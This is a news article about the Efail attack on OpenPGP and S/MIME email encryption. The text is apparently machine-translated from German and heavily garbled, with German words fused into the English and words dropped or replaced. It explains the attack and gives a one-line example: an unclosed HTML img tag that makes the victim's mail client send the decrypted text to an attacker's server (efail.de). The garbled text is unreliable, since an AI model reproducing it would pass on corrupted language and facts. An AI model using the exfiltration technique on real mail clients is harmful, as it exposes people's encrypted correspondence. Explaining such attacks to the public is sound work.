A team of VonIT security researchers from Bochum and Münster has discovered verschiedeneSicherheitsprobleme in encryption technologies for e-mails. They have baptized ir attack Efail. Dabeinutzen a weakness of old but still used encryption technologies called OPENPGP and S/MIME and combine m with possibilities Vonmodernen mail programs that can display mails with images and or contents – so-called HTML mails.
So far, DieMailverschlüsselung was particularly critical because sievergleichsweise is difficult to use and to set up. In practice, refore, only a small minority of users and users use encrypted e-mails. For most users, attack has also WenigPraxisrelevanz – normal, i.e. unencrypted emails are just as unsicherwie y were before. Likewise not affected by attack is Diesogenannte transport encryption with TLS. However, it only protects user and its mail provider.
Orwise encryption MitPGP or S/MIME: If users use m correctly, it offers a high degree of security, one thought anyway. This view now gets some scratches, even if researchers do not directly attack encryption itself. With a trick, however, attackers can have content DerNachrichten sent after decryption.
The encryption is bypassedHow is that possible? Both Technikennutzen encryption modes, which do not guarantee aunticity of data. This means that an attacker cannot read mail directly, he kannaber manipulate its contents. The details are a little more complex, Abervereinfacht said: If an attacker accesses an encrypted Mailhat, for example, by taking m with a man-in--middle attack, he can generate Eineauf ir second encrypted mail based on m. It has partially anor, controlled content.
This property uses Efailaus. Modern mail programs and also webmailers make it possible to make e-mails in several parts extensive. In this way, images or fonts can be used Hispanics design possibilities of HTML standard, which also represents dieBasis of websites. The trick that is used at Efail: email is rewritten so that it sends an image from attacker's server lädtund unencrypted content of original mail.
For example: DieAngreiferin sends an HTML part as first part of a message, derbeispielsweise loads an image, but does not close HTML tag. So about lt; img src = "//efail.de/. Second, it attaches encrypted part of a mail that you have read. ImMailclient of victim now happens: first, encrypted part is decrypted. Second, in this case, an image is loaded from server DerAngreiferin. The path is appended to content of decrypted Textteilscodiert, such as: Http://efail.de/GEHEIMER_TEXT
An attacker does not decrypt diemail himself, but he allows recipient of mail to decrypt message and n send it in plain text to a server under his control. This also has consequence that even in past Verschickteverschlüsselte messages are at risk.
Date Of Update: 16 May 2018, 12:03
